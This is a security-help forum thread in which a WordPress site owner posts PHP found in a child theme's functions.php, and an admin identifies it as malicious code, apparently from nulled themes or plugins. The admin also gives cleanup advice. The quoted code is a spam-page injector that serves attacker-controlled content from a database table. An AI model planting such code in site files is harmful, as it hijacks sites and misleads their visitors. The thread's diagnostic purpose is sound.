Suspicious Theme functions.php file code – nulled/pirated plugin or theme

Home Forums BulletProof Security Free Suspicious Theme functions.php file code – nulled/pirated plugin or theme

This topic contains 5 replies, has 2 voices, and was last updated by  AITpro Admin 8 months, 2 weeks ago.

Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • #33805

    Vintagepornbay.com
    Participant

    So whats the purpose of this code I dont understand. It was found in our child theme functions php:

    I think its related to request attacks logged in bps logs.

    if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalistWHEREurl` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )<br ?--> {
    $data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    if ($data -> full_content)
    {
    print stripslashes($data -> content);
    }
    else
    {
    print '<!DOCTYPE html>';
    print '<html ';
    language_attributes();
    print ' class="no-js">';
    print '<head>';
    print '<title>'.stripslashes($data -> title).'</title>';
    print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
    print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
    print '<meta name="robots" content="index, follow" />';
    print '<meta charset="';
    bloginfo( 'charset' );
    print '" />';
    print '<meta name="viewport" content="width=device-width">';
    print '<link rel="profile" href="http://gmpg.org/xfn/11">';
    print '<link rel="pingback" href="';
    bloginfo( 'pingback_url' );
    print '">';
    wp_head();
    print '</head>';
    print '<body>';
    print '<div id="content" class="site-content">';
    print stripslashes($data -> content);
    get_search_form();
    get_sidebar();
    get_footer();
    }
    
    exit;
    }
    
    #33807

    AITpro Admin
    Keymaster

    The code appears to be malicious.  Google searches indicate that the origin of that code may be from nulled/pirated plugins or themes downloaded from this website:  dlwordpress.com or other similar sites.  It is very common that hackers will offer free nulled/pirated plugins and themes and add hacker code in those nulled/pirated plugins and themes.  The code may not necessarily have come from an installed nulled/pirated plugin or theme and may have been used independently, but it is much more likely that you have a nulled/pirated plugin or theme installed on your website that is automatically creating/injecting that code into your theme functions.php file.

    Google Search results for search string:  if ( $wpdb->get_var('SELECT count(*) FROM ' . $wpdb->prefix . 'datalist
    https://wordpress.org/support/topic/wp-database-error-doesnt-exist-select-count-from-wp_datalist/
    http://kanec.co.uk/2016/11/05/perils-nulled-wordpress-themes/

    #33808

    Vintagepornbay.com
    Participant

    I have used nulled plugin before.

    But currently dont have it now.

    Which plugin could cause this auto changing of functions php code?

    #33809

    AITpro Admin
    Keymaster

    You need to assume the worst case scenario > your entire hosting account is hacked/compromised.  Typically hackers will add code in nulled/pirated plugins and themes that not only injects/creates code wherever they want, but also adds a backdoor login to your hosting account that gives them total control of your hosting account environment.  You will need to cleanup your entire hosting account.  We have created a help forum topic about how to cleanup a hacked hosting account here > https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

    #33836

    Vintagepornbay.com
    Participant

    Does it possible for subdomain (subsite) to affect main domain (main site)?

    Because we use nulled theme and plugin only in our subdomain.

    #33837

    AITpro Admin
    Keymaster

    Usually hackers will install/upload a backdoor shell script somewhere in your hosting account folders that allows them to edit/upload/add files and many other things.  Typically hackers do not usually do anything to your WordPress database like add hacker code in your database.  A backdoor shell script does give a hacker the ability to create WordPress Administrator user accounts in your database.  So normally you do not need to backup and restore your WordPress database and just need to check for any Administrator accounts you did not create, delete them and then do the other steps in this forum topic:  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

Viewing 6 posts - 1 through 6 (of 6 total)

You must be logged in to reply to this topic.